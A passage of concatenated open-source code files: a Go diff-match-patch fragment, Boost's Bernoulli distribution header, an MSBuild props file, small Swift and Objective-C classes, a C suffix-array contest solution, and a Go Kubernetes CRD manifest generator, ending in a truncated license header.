pointer++
}
countInsert = 0
countDelete = 0
textDelete = nil
textInsert = nil
break
}
}
if len(diffs[len(diffs)-1].Text) == 0 {
diffs = diffs[0 : len(diffs)-1] // Remove the dummy entry at the end.
}
// Second pass: look for single edits surrounded on both sides by equalities which can be shifted sideways to eliminate an equality. E.g: A<ins>BA</ins>C -> <ins>AB</ins>AC
changes := false
pointer = 1
// Intentionally ignore the first and last element (don't need checking).
for pointer < (len(diffs) - 1) {
if diffs[pointer-1].Type == DiffEqual &&
diffs[pointer+1].Type == DiffEqual {
// This is a single edit surrounded by equalities.
if strings.HasSuffix(diffs[pointer].Text, diffs[pointer-1].Text) {
// Shift the edit over the previous equality.
diffs[pointer].Text = diffs[pointer-1].Text +
diffs[pointer].Text[:len(diffs[pointer].Text)-len(diffs[pointer-1].Text)]
diffs[pointer+1].Text = diffs[pointer-1].Text + diffs[pointer+1].Text
diffs = splice(diffs, pointer-1, 1)
changes = true
} else if strings.HasPrefix(diffs[pointer].Text, diffs[pointer+1].Text) {
// Shift the edit over the next equality.
diffs[pointer-1].Text += diffs[pointer+1].Text
diffs[pointer].Text =
diffs[pointer].Text[len(diffs[pointer+1].Text):] + diffs[pointer+1].Text
diffs = splice(diffs, pointer+1, 1)
changes = true
}
}
pointer++
}
// If shifts were made, the diff needs reordering and another shift sweep.
if changes {
diffs = dmp.DiffCleanupMerge(diffs)
}
return diffs
}
// DiffXIndex returns the equivalent location in s2.
func (dmp *DiffMatchPatch) DiffXIndex(diffs []Diff, loc int) int {
chars1 := 0
chars2 := 0
lastChars1 := 0
lastChars2 := 0
lastDiff := Diff{}
for i := 0; i < len(diffs); i++ {
aDiff := diffs[i]
if aDiff.Type != DiffInsert {
// Equality or deletion.
chars1 += len(aDiff.Text)
}
if aDiff.Type != DiffDelete {
// Equality or insertion.
chars2 += len(aDiff.Text)
}
if chars1 > loc {
// Overshot the location.
lastDiff = aDiff
break
}
lastChars1 = chars1
lastChars2 = chars2
}
if lastDiff.Type == DiffDelete {
// The location was deleted.
return lastChars2
}
// Add the remaining character length.
return lastChars2 + (loc - lastChars1)
}
// DiffPrettyHtml converts a []Diff into a pretty HTML report.
// It is intended as an example from which to write one's own display functions.
func (dmp *DiffMatchPatch) DiffPrettyHtml(diffs []Diff) string {
var buff bytes.Buffer
for _, diff := range diffs {
text := strings.Replace(html.EscapeString(diff.Text), "\n", "¶<br>", -1)
switch diff.Type {
case DiffInsert:
_, _ = buff.WriteString("<ins style=\"background:#e6ffe6;\">")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("</ins>")
case DiffDelete:
_, _ = buff.WriteString("<del style=\"background:#ffe6e6;\">")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("</del>")
case DiffEqual:
_, _ = buff.WriteString("<span>")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("</span>")
}
}
return buff.String()
}
// DiffPrettyText converts a []Diff into a colored text report.
func (dmp *DiffMatchPatch) DiffPrettyText(diffs []Diff) string {
var buff bytes.Buffer
for _, diff := range diffs {
text := diff.Text
switch diff.Type {
case DiffInsert:
_, _ = buff.WriteString("\x1b[32m")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("\x1b[0m")
case DiffDelete:
_, _ = buff.WriteString("\x1b[31m")
_, _ = buff.WriteString(text)
_, _ = buff.WriteString("\x1b[0m")
case DiffEqual:
_, _ = buff.WriteString(text)
}
}
return buff.String()
}
// DiffText1 computes and returns the source text (all equalities and deletions).
func (dmp *DiffMatchPatch) DiffText1(diffs []Diff) string {
//StringBuilder text = new StringBuilder()
var text bytes.Buffer
for _, aDiff := range diffs {
if aDiff.Type != DiffInsert {
_, _ = text.WriteString(aDiff.Text)
}
}
return text.String()
}
// DiffText2 computes and returns the destination text (all equalities and insertions).
func (dmp *DiffMatchPatch) DiffText2(diffs []Diff) string {
var text bytes.Buffer
for _, aDiff := range diffs {
if aDiff.Type != DiffDelete {
_, _ = text.WriteString(aDiff.Text)
}
}
return text.String()
}
// DiffLevenshtein computes the Levenshtein distance that is the number of inserted, deleted or substituted characters.
func (dmp *DiffMatchPatch) DiffLevenshtein(diffs []Diff) int {
levenshtein := 0
insertions := 0
deletions := 0
for _, aDiff := range diffs {
switch aDiff.Type {
case DiffInsert:
insertions += len(aDiff.Text)
case DiffDelete:
deletions += len(aDiff.Text)
case DiffEqual:
// A deletion and an insertion is one substitution.
levenshtein += max(insertions, deletions)
insertions = 0
deletions = 0
}
}
levenshtein += max(insertions, deletions)
return levenshtein
}
// DiffToDelta crushes the diff into an encoded string which describes the operations required to transform text1 into text2.
// E.g. =3\t-2\t+ing -> Keep 3 chars, delete 2 chars, insert 'ing'. Operations are tab-separated. Inserted text is escaped using %xx notation.
func (dmp *DiffMatchPatch) DiffToDelta(diffs []Diff) string {
var text bytes.Buffer
for _, aDiff := range diffs {
switch aDiff.Type {
case DiffInsert:
_, _ = text.WriteString("+")
_, _ = text.WriteString(strings.Replace(url.QueryEscape(aDiff.Text), "+", " ", -1))
_, _ = text.WriteString("\t")
break
case DiffDelete:
_, _ = text.WriteString("-")
_, _ = text.WriteString(strconv.Itoa(utf8.RuneCountInString(aDiff.Text)))
_, _ = text.WriteString("\t")
break
case DiffEqual:
_, _ = text.WriteString("=")
_, _ = text.WriteString(strconv.Itoa(utf8.RuneCountInString(aDiff.Text)))
_, _ = text.WriteString("\t")
break
}
}
delta := text.String()
if len(delta) != 0 {
// Strip off trailing tab character.
delta = delta[0 : utf8.RuneCountInString(delta)-1]
delta = unescaper.Replace(delta)
}
return delta
}
// DiffFromDelta, given the original text1 and an encoded string which describes the operations required to transform text1 into text2, computes the full diff.
func (dmp *DiffMatchPatch) DiffFromDelta(text1 string, delta string) (diffs []Diff, err error) {
i := 0
runes := []rune(text1)
for _, token := range strings.Split(delta, "\t") {
if len(token) == 0 {
// Blank tokens are ok (from a trailing \t).
continue
}
// Each token begins with a one character parameter which specifies the operation of this token (delete, insert, equality).
param := token[1:]
switch op := token[0]; op {
case '+':
// Decode would change all "+" to " "
param = strings.Replace(param, "+", "%2b", -1)
param, err = url.QueryUnescape(param)
if err != nil {
return nil, err
}
if !utf8.ValidString(param) {
return nil, fmt.Errorf("invalid UTF-8 token: %q", param)
}
diffs = append(diffs, Diff{DiffInsert, param})
case '=', '-':
n, err := strconv.ParseInt(param, 10, 0)
if err != nil {
return nil, err
} else if n < 0 {
return nil, errors.New("Negative number in DiffFromDelta: " + param)
}
i += int(n)
// Break out if we are out of bounds, go1.6 can't handle this very well
if i > len(runes) {
break
}
// Remember that string slicing is by byte - we want by rune here.
text := string(runes[i-int(n) : i])
if op == '=' {
diffs = append(diffs, Diff{DiffEqual, text})
} else {
diffs = append(diffs, Diff{DiffDelete, text})
}
default:
// Anything else is an error.
return nil, errors.New("Invalid diff operation in DiffFromDelta: " + string(token[0]))
}
}
if i != len(runes) {
return nil, fmt.Errorf("Delta length (%v) is different from source text length (%v)", i, len(text1))
}
return diffs, nil
}
| {
"pile_set_name": "Github"
} |
// boost\math\distributions\bernoulli.hpp
// Copyright John Maddock 2006.
// Copyright Paul A. Bristow 2007.
// Use, modification and distribution are subject to the
// Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt
// or copy at http://www.boost.org/LICENSE_1_0.txt)
// http://en.wikipedia.org/wiki/bernoulli_distribution
// http://mathworld.wolfram.com/BernoulliDistribution.html
// bernoulli distribution is the discrete probability distribution of
// the number (k) of successes, in a single Bernoulli trial.
// It is a version of the binomial distribution when n = 1.
// But note that the bernoulli distribution
// (like others including the poisson, binomial & negative binomial)
// is strictly defined as a discrete function: only integral values of k are envisaged.
// However, because of the method of calculation using a continuous gamma function,
// it is convenient to treat it as if it were a continuous function,
// and permit non-integral values of k.
// To enforce the strict mathematical model, users should use floor or ceil functions
// on k outside this function to ensure that k is integral.
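// A minimal usage sketch (illustrative only; it simply exercises the pdf, cdf
// and quantile overloads defined later in this header):
//
//   #include <boost/math/distributions/bernoulli.hpp>
//
//   boost::math::bernoulli_distribution<> coin(0.5);  // 'fair' coin
//   double p0 = boost::math::pdf(coin, 0.);           // P(k == 0) == 0.5
//   double c0 = boost::math::cdf(coin, 0.);           // P(k <= 0) == 0.5
//   double k  = boost::math::quantile(coin, 0.25);    // smallest k with cdf(k) >= 0.25, here 0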
#ifndef BOOST_MATH_SPECIAL_BERNOULLI_HPP
#define BOOST_MATH_SPECIAL_BERNOULLI_HPP
#include <boost/math/distributions/fwd.hpp>
#include <boost/math/tools/config.hpp>
#include <boost/math/distributions/complement.hpp> // complements
#include <boost/math/distributions/detail/common_error_handling.hpp> // error checks
#include <boost/math/special_functions/fpclassify.hpp> // isnan.
#include <utility>
namespace boost
{
namespace math
{
namespace bernoulli_detail
{
// Common error checking routines for bernoulli distribution functions:
template <class RealType, class Policy>
inline bool check_success_fraction(const char* function, const RealType& p, RealType* result, const Policy& /* pol */)
{
if(!(boost::math::isfinite)(p) || (p < 0) || (p > 1))
{
*result = policies::raise_domain_error<RealType>(
function,
"Success fraction argument is %1%, but must be >= 0 and <= 1 !", p, Policy());
return false;
}
return true;
}
template <class RealType, class Policy>
inline bool check_dist(const char* function, const RealType& p, RealType* result, const Policy& /* pol */, const mpl::true_&)
{
return check_success_fraction(function, p, result, Policy());
}
template <class RealType, class Policy>
inline bool check_dist(const char* , const RealType& , RealType* , const Policy& /* pol */, const mpl::false_&)
{
return true;
}
template <class RealType, class Policy>
inline bool check_dist(const char* function, const RealType& p, RealType* result, const Policy& /* pol */)
{
return check_dist(function, p, result, Policy(), typename policies::constructor_error_check<Policy>::type());
}
template <class RealType, class Policy>
inline bool check_dist_and_k(const char* function, const RealType& p, RealType k, RealType* result, const Policy& pol)
{
if(check_dist(function, p, result, Policy(), typename policies::method_error_check<Policy>::type()) == false)
{
return false;
}
if(!(boost::math::isfinite)(k) || !((k == 0) || (k == 1)))
{
*result = policies::raise_domain_error<RealType>(
function,
"Number of successes argument is %1%, but must be 0 or 1 !", k, pol);
return false;
}
return true;
}
template <class RealType, class Policy>
inline bool check_dist_and_prob(const char* function, RealType p, RealType prob, RealType* result, const Policy& /* pol */)
{
if((check_dist(function, p, result, Policy(), typename policies::method_error_check<Policy>::type()) && detail::check_probability(function, prob, result, Policy())) == false)
{
return false;
}
return true;
}
} // namespace bernoulli_detail
template <class RealType = double, class Policy = policies::policy<> >
class bernoulli_distribution
{
public:
typedef RealType value_type;
typedef Policy policy_type;
bernoulli_distribution(RealType p = 0.5) : m_p(p)
{ // Default probability = half suits 'fair' coin tossing
// where probability of heads == probability of tails.
RealType result; // of checks.
bernoulli_detail::check_dist(
"boost::math::bernoulli_distribution<%1%>::bernoulli_distribution",
m_p,
&result, Policy());
} // bernoulli_distribution constructor.
RealType success_fraction() const
{ // Probability.
return m_p;
}
private:
RealType m_p; // success_fraction
}; // template <class RealType> class bernoulli_distribution
typedef bernoulli_distribution<double> bernoulli;
template <class RealType, class Policy>
inline const std::pair<RealType, RealType> range(const bernoulli_distribution<RealType, Policy>& /* dist */)
{ // Range of permissible values for random variable k = {0, 1}.
using boost::math::tools::max_value;
return std::pair<RealType, RealType>(static_cast<RealType>(0), static_cast<RealType>(1));
}
template <class RealType, class Policy>
inline const std::pair<RealType, RealType> support(const bernoulli_distribution<RealType, Policy>& /* dist */)
{ // Range of supported values for random variable k = {0, 1}.
// This is range where cdf rises from 0 to 1, and outside it, the pdf is zero.
return std::pair<RealType, RealType>(static_cast<RealType>(0), static_cast<RealType>(1));
}
template <class RealType, class Policy>
inline RealType mean(const bernoulli_distribution<RealType, Policy>& dist)
{ // Mean of bernoulli distribution = p (n = 1).
return dist.success_fraction();
} // mean
// Rely on derived_accessors quantile(half)
//template <class RealType>
//inline RealType median(const bernoulli_distribution<RealType, Policy>& dist)
//{ // Median of bernoulli distribution is not defined.
// return tools::domain_error<RealType>(BOOST_CURRENT_FUNCTION, "Median is not implemented, result is %1%!", std::numeric_limits<RealType>::quiet_NaN());
//} // median
template <class RealType, class Policy>
inline RealType variance(const bernoulli_distribution<RealType, Policy>& dist)
{ // Variance of bernoulli distribution =p * q.
return dist.success_fraction() * (1 - dist.success_fraction());
} // variance
template <class RealType, class Policy>
RealType pdf(const bernoulli_distribution<RealType, Policy>& dist, const RealType& k)
{ // Probability Density/Mass Function.
BOOST_FPU_EXCEPTION_GUARD
// Error check:
RealType result = 0; // of checks.
if(false == bernoulli_detail::check_dist_and_k(
"boost::math::pdf(bernoulli_distribution<%1%>, %1%)",
dist.success_fraction(), // 0 to 1
k, // 0 or 1
&result, Policy()))
{
return result;
}
// Assume k is integral.
if (k == 0)
{
return 1 - dist.success_fraction(); // 1 - p
}
else // k == 1
{
return dist.success_fraction(); // p
}
} // pdf
template <class RealType, class Policy>
inline RealType cdf(const bernoulli_distribution<RealType, Policy>& dist, const RealType& k)
{ // Cumulative Distribution Function Bernoulli.
RealType p = dist.success_fraction();
// Error check:
RealType result = 0;
if(false == bernoulli_detail::check_dist_and_k(
"boost::math::cdf(bernoulli_distribution<%1%>, %1%)",
p,
k,
&result, Policy()))
{
return result;
}
if (k == 0)
{
return 1 - p;
}
else
{ // k == 1
return 1;
}
} // bernoulli cdf
template <class RealType, class Policy>
inline RealType cdf(const complemented2_type<bernoulli_distribution<RealType, Policy>, RealType>& c)
{ // Complemented Cumulative Distribution Function bernoulli.
RealType const& k = c.param;
bernoulli_distribution<RealType, Policy> const& dist = c.dist;
RealType p = dist.success_fraction();
// Error checks:
RealType result = 0;
if(false == bernoulli_detail::check_dist_and_k(
"boost::math::cdf(bernoulli_distribution<%1%>, %1%)",
p,
k,
&result, Policy()))
{
return result;
}
if (k == 0)
{
return p;
}
else
{ // k == 1
return 0;
}
} // bernoulli cdf complement
template <class RealType, class Policy>
inline RealType quantile(const bernoulli_distribution<RealType, Policy>& dist, const RealType& p)
{ // Quantile or Percent Point Bernoulli function.
// Return the number of expected successes k either 0 or 1.
// for a given probability p.
RealType result = 0; // of error checks:
if(false == bernoulli_detail::check_dist_and_prob(
"boost::math::quantile(bernoulli_distribution<%1%>, %1%)",
dist.success_fraction(),
p,
&result, Policy()))
{
return result;
}
if (p <= (1 - dist.success_fraction()))
{ // p <= pdf(dist, 0) == cdf(dist, 0)
return 0;
}
else
{
return 1;
}
} // quantile
template <class RealType, class Policy>
inline RealType quantile(const complemented2_type<bernoulli_distribution<RealType, Policy>, RealType>& c)
{ // Quantile or Percent Point bernoulli function.
// Return the number of expected successes k for a given
// complement of the probability q.
//
// Error checks:
RealType q = c.param;
const bernoulli_distribution<RealType, Policy>& dist = c.dist;
RealType result = 0;
if(false == bernoulli_detail::check_dist_and_prob(
"boost::math::quantile(bernoulli_distribution<%1%>, %1%)",
dist.success_fraction(),
q,
&result, Policy()))
{
return result;
}
if (q <= 1 - dist.success_fraction())
{ // // q <= cdf(complement(dist, 0)) == pdf(dist, 0)
return 1;
}
else
{
return 0;
}
} // quantile complemented.
template <class RealType, class Policy>
inline RealType mode(const bernoulli_distribution<RealType, Policy>& dist)
{
return static_cast<RealType>((dist.success_fraction() <= 0.5) ? 0 : 1); // p = 0.5 can be 0 or 1
}
template <class RealType, class Policy>
inline RealType skewness(const bernoulli_distribution<RealType, Policy>& dist)
{
BOOST_MATH_STD_USING; // Aid ADL for sqrt.
RealType p = dist.success_fraction();
return (1 - 2 * p) / sqrt(p * (1 - p));
}
template <class RealType, class Policy>
inline RealType kurtosis_excess(const bernoulli_distribution<RealType, Policy>& dist)
{
RealType p = dist.success_fraction();
// Note Wolfram says this is kurtosis in text, but gamma2 is the kurtosis excess,
// and Wikipedia also says this is the kurtosis excess formula.
// return (6 * p * p - 6 * p + 1) / (p * (1 - p));
// But Wolfram kurtosis article gives this simpler formula for kurtosis excess:
return 1 / (1 - p) + 1/p -6;
}
template <class RealType, class Policy>
inline RealType kurtosis(const bernoulli_distribution<RealType, Policy>& dist)
{
RealType p = dist.success_fraction();
return 1 / (1 - p) + 1/p -6 + 3;
// Simpler than:
// return (6 * p * p - 6 * p + 1) / (p * (1 - p)) + 3;
}
} // namespace math
} // namespace boost
// This include must be at the end, *after* the accessors
// for this distribution have been defined, in order to
// keep compilers that support two-phase lookup happy.
#include <boost/math/distributions/detail/derived_accessors.hpp>
#endif // BOOST_MATH_SPECIAL_BERNOULLI_HPP
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\src\vvvv45.props" />
<PropertyGroup>
<SolutionDir Condition="$(SolutionDir) == '' Or $(SolutionDir) == '*Undefined*'">.\</SolutionDir>
<RestorePackages>true</RestorePackages>
</PropertyGroup>
  <!-- Override vvvv45.props -->
<!-- Build -->
<PropertyGroup>
<AddonCoreDir>$(MSBuildThisFileDirectory)..\lib\core\</AddonCoreDir>
<AddonPluginsDir>$(MSBuildThisFileDirectory)..\lib\nodes\plugins\</AddonPluginsDir>
</PropertyGroup>
<!-- Deploy -->
<PropertyGroup>
<DeployPrefix>addons</DeployPrefix>
<DeployDir>$(DeployBaseDir)addonpack\</DeployDir>
<DeployInclude>..\**\*.*</DeployInclude>
<DeployExclude>..\**\.gitignore;..\**\*.pdb;..\src\**\*.*;..\tests\**\*.*;..\lib\nodes\plugins\*\bin\**\*.*</DeployExclude>
<!-- Files to exclude for platform specific builds -->
<DeployExclude Condition=" '$(Platform)' == 'x86' ">$(DeployExclude)</DeployExclude>
<DeployExclude Condition=" '$(Platform)' == 'x64' ">$(DeployExclude);..\lib\nodes\freeframes\*.*</DeployExclude>
<DeployReadOnlyFiles>lib\nodes\*.*</DeployReadOnlyFiles>
<DeploySignFiles>false</DeploySignFiles>
</PropertyGroup>
</Project>
| {
"pile_set_name": "Github"
} |
//
// Contacts.swift
// Telephone
//
// Copyright © 2008-2016 Alexey Kuznetsov
// Copyright © 2016-2020 64 Characters
//
// Telephone is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Telephone is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
public protocol Contacts {
func enumerate(_ body: @escaping (Contact) -> Void)
}
| {
"pile_set_name": "Github"
} |
//
// MIT License
//
// Copyright (c) 2014 Bob McCune http://bobmccune.com/
// Copyright (c) 2014 TapHarmonic, LLC http://tapharmonic.com/
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
#import "THThumbnail.h"
@implementation THThumbnail
+ (instancetype)thumbnailWithImage:(UIImage *)image time:(CMTime)time {
return [[self alloc] initWithImage:image time:time];
}
- (id)initWithImage:(UIImage *)image time:(CMTime)time {
self = [super init];
if (self) {
_image = image;
_time = time;
}
return self;
}
@end
| {
"pile_set_name": "Github"
} |
#include "stdio.h"
#include "string.h"
#define maxn 20203
#define F(x) ((x)/3+((x)%3==1?0:tb))
#define G(x) ((x)<tb?(x)*3+1:((x)-tb)*3+2)
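/* Contest-style implementation of the DC3 (skew) suffix-array algorithm with a
 * Kasai LCP ("height") array, followed by a binary search on the answer length.
 * main() appears to solve the classic "longest substring common to all n input
 * strings, allowing each string to be reversed" problem; the concrete judge
 * problem is not identified in the source. */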
int wa[maxn],wb[maxn],wv[maxn],ws[maxn];
int c0(int *r,int a,int b)
{return r[a]==r[b]&&r[a+1]==r[b+1]&&r[a+2]==r[b+2];}
int c12(int k,int *r,int a,int b)
{if(k==2) return r[a]<r[b]||r[a]==r[b]&&c12(1,r,a+1,b+1);
else return r[a]<r[b]||r[a]==r[b]&&wv[a+1]<wv[b+1];}
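/* sort: one stable counting-sort (radix) pass; indices a[0..n) are ordered
 * into b[] by the key r[a[i]], with key values assumed to lie in [0, m). */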
void sort(int *r,int *a,int *b,int n,int m)
{
int i;
for(i=0;i<n;i++) wv[i]=r[a[i]];
for(i=0;i<m;i++) ws[i]=0;
for(i=0;i<n;i++) ws[wv[i]]++;
for(i=1;i<m;i++) ws[i]+=ws[i-1];
for(i=n-1;i>=0;i--) b[--ws[wv[i]]]=a[i];
return;
}
void dc3(int *r,int *sa,int n,int m)
{
int i,j,*rn=r+n,*san=sa+n,ta=0,tb=(n+1)/3,tbc=0,p;
r[n]=r[n+1]=0;
for(i=0;i<n;i++) if(i%3!=0) wa[tbc++]=i;
sort(r+2,wa,wb,tbc,m);
sort(r+1,wb,wa,tbc,m);
sort(r,wa,wb,tbc,m);
for(p=1,rn[F(wb[0])]=0,i=1;i<tbc;i++)
rn[F(wb[i])]=c0(r,wb[i-1],wb[i])?p-1:p++;
if(p<tbc) dc3(rn,san,tbc,p);
else for(i=0;i<tbc;i++) san[rn[i]]=i;
for(i=0;i<tbc;i++) if(san[i]<tb) wb[ta++]=san[i]*3;
if(n%3==1) wb[ta++]=n-1;
sort(r,wb,wa,ta,m);
for(i=0;i<tbc;i++) wv[wb[i]=G(san[i])]=i;
for(i=0,j=0,p=0;i<ta && j<tbc;p++)
sa[p]=c12(wb[j]%3,r,wa[i],wb[j])?wa[i++]:wb[j++];
for(;i<ta;p++) sa[p]=wa[i++];
for(;j<tbc;p++) sa[p]=wb[j++];
return;
}
int rank[maxn],height[maxn];
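/* calheight: builds rank[] (the inverse of sa[]) and height[], where height[i]
 * is the length of the longest common prefix of suffixes sa[i-1] and sa[i],
 * using Kasai's O(n) algorithm. */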
void calheight(int *r,int *sa,int n)
{
int i,j,k=0;
for(i=1;i<=n;i++) rank[sa[i]]=i;
for(i=0;i<n;height[rank[i++]]=k)
for(k?k--:0,j=sa[rank[i]-1];r[i+k]==r[j+k];k++);
return;
}
int r[maxn*3],sa[maxn*3];
int who[maxn],yes[101]={0},ii=0;
int len,n;
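/* check: returns 1 if some common substring of length >= mid occurs in all n
 * input strings (a string and its reversal count as the same source).
 * Consecutive suffixes whose height stays >= mid share a prefix of that
 * length; who[]/yes[] count how many distinct source strings the group covers. */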
int check(int mid)
{
int i,j,k,t,s;
for(i=2;i<=len;i=j+1)
{
for(;height[i]<mid && i<=len;i++);
for(j=i;height[j]>=mid;j++);
if(j-i+1<n) continue;
ii++;s=0;
for(k=i-1;k<j;k++)
if((t=who[sa[k]])!=0)
if(yes[t]!=ii) yes[t]=ii,s++;
if(s>=n) return 1;
}
return 0;
}
char st[110];
int main()
{
int i,j,k,min,mid,max,nn;
scanf("%d",&nn);
while(nn-->0)
{
scanf("%d",&n);
len=0;
for(i=1;i<=n;i++)
{
scanf("%s",st);
k=strlen(st);
for(j=0;j<k;j++)
{
r[j+len]=st[j]+200;
who[j+len]=i;
}
r[len+k]=2*i-1;
who[len+k]=0;
len+=k+1;
for(j=0;j<k;j++)
{
r[j+len]=st[k-1-j]+200;
who[j+len]=i;
}
r[len+k]=2*i;
who[len+k]=0;
len+=k+1;
}
len--;
r[len]=0;
dc3(r,sa,len+1,328);
calheight(r,sa,len);
height[len+1]=-1;
min=1;max=100;
while(min<=max)
{
mid=(min+max)>>1;
if(check(mid)) min=mid+1;
else max=mid-1;
}
if(n==1) max=len/2;
printf("%d\n",max);
}
return 0;
}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package generator
import (
"fmt"
"log"
"os"
"path"
"strings"
"github.com/ghodss/yaml"
"github.com/spf13/afero"
extensionsv1beta1 "k8s.io/apiextensions-apiserver/pkg/apis/apiextensions/v1beta1"
"k8s.io/gengo/args"
"k8s.io/gengo/types"
crdutil "sigs.k8s.io/controller-tools/pkg/crd/util"
"sigs.k8s.io/controller-tools/pkg/internal/codegen"
"sigs.k8s.io/controller-tools/pkg/internal/codegen/parse"
"sigs.k8s.io/controller-tools/pkg/util"
)
// Generator generates CRD manifests from API resource definitions defined in Go source files.
type Generator struct {
RootPath string
OutputDir string
Domain string
Namespace string
SkipMapValidation bool
// OutFs is filesystem to be used for writing out the result
OutFs afero.Fs
// apisPkg is the absolute Go pkg name for current project's 'pkg/apis' pkg.
// This is needed to determine if a Type belongs to the project or it is a referred Type.
apisPkg string
}
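// A minimal usage sketch (an assumption based only on the exported fields and
// methods in this file, not a documented entry point):
//
//	g := &Generator{RootPath: "/go/src/example.com/project", SkipMapValidation: true}
//	if err := g.ValidateAndInitFields(); err != nil {
//		log.Fatal(err)
//	}
//	if err := g.Do(); err != nil {
//		log.Fatal(err)
//	}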
// ValidateAndInitFields validates and initializes the generator fields.
func (c *Generator) ValidateAndInitFields() error {
var err error
if c.OutFs == nil {
c.OutFs = afero.NewOsFs()
}
if len(c.RootPath) == 0 {
// Take current path as root path if not specified.
c.RootPath, err = os.Getwd()
if err != nil {
return err
}
}
// Validate root path is under go src path
if !crdutil.IsUnderGoSrcPath(c.RootPath) {
return fmt.Errorf("command must be run from path under $GOPATH/src/<package>")
}
// If Domain is not explicitly specified,
// try to search for PROJECT file as a basis.
if len(c.Domain) == 0 {
if !crdutil.PathHasProjectFile(c.RootPath) {
return fmt.Errorf("PROJECT file missing in dir %s", c.RootPath)
}
c.Domain = crdutil.GetDomainFromProject(c.RootPath)
}
// Validate apis directory exists under working path
apisPath := path.Join(c.RootPath, "pkg/apis")
if _, err := os.Stat(apisPath); err != nil {
return fmt.Errorf("error validating apis path %s: %v", apisPath, err)
}
c.apisPkg, err = crdutil.DirToGoPkg(apisPath)
if err != nil {
return err
}
// Init output directory
if c.OutputDir == "" {
c.OutputDir = path.Join(c.RootPath, "config/crds")
}
return nil
}
// Do manages CRD generation.
func (c *Generator) Do() error {
arguments := args.Default()
b, err := arguments.NewBuilder()
if err != nil {
return fmt.Errorf("failed making a parser: %v", err)
}
// Switch working directory to root path.
if err := os.Chdir(c.RootPath); err != nil {
return fmt.Errorf("failed switching working dir: %v", err)
}
if err := b.AddDirRecursive("./pkg/apis"); err != nil {
return fmt.Errorf("failed making a parser: %v", err)
}
ctx, err := parse.NewContext(b)
if err != nil {
return fmt.Errorf("failed making a context: %v", err)
}
arguments.CustomArgs = &parse.Options{SkipMapValidation: c.SkipMapValidation}
// TODO: find an elegant way to fulfill the domain in APIs.
p := parse.NewAPIs(ctx, arguments, c.Domain, c.apisPkg)
crds := c.getCrds(p)
return c.writeCRDs(crds)
}
func (c *Generator) writeCRDs(crds map[string][]byte) error {
// Ensure output dir exists.
if err := c.OutFs.MkdirAll(c.OutputDir, os.FileMode(0700)); err != nil {
return err
}
for file, crd := range crds {
outFile := path.Join(c.OutputDir, file)
if err := (&util.FileWriter{Fs: c.OutFs}).WriteFile(outFile, crd); err != nil {
return err
}
}
return nil
}
func getCRDFileName(resource *codegen.APIResource) string {
elems := []string{resource.Group, resource.Version, strings.ToLower(resource.Kind)}
return strings.Join(elems, "_") + ".yaml"
}
func (c *Generator) getCrds(p *parse.APIs) map[string][]byte {
crds := map[string]extensionsv1beta1.CustomResourceDefinition{}
for _, g := range p.APIs.Groups {
for _, v := range g.Versions {
for _, r := range v.Resources {
crd := r.CRD
// ignore types which do not belong to this project
if !c.belongsToAPIsPkg(r.Type) {
continue
}
if len(c.Namespace) > 0 {
crd.Namespace = c.Namespace
}
fileName := getCRDFileName(r)
crds[fileName] = crd
}
}
}
result := map[string][]byte{}
for file, crd := range crds {
b, err := yaml.Marshal(crd)
if err != nil {
log.Fatalf("Error: %v", err)
}
result[file] = b
}
return result
}
// belongsToAPIsPkg returns true if type t is defined under pkg/apis pkg of
// current project.
func (c *Generator) belongsToAPIsPkg(t *types.Type) bool {
return strings.HasPrefix(t.Name.Package, c.apisPkg)
}
| {
"pile_set_name": "Github"
} |
enum IsPathHandler(alias T) = is(PathHandler == typeof(T));
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2016, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
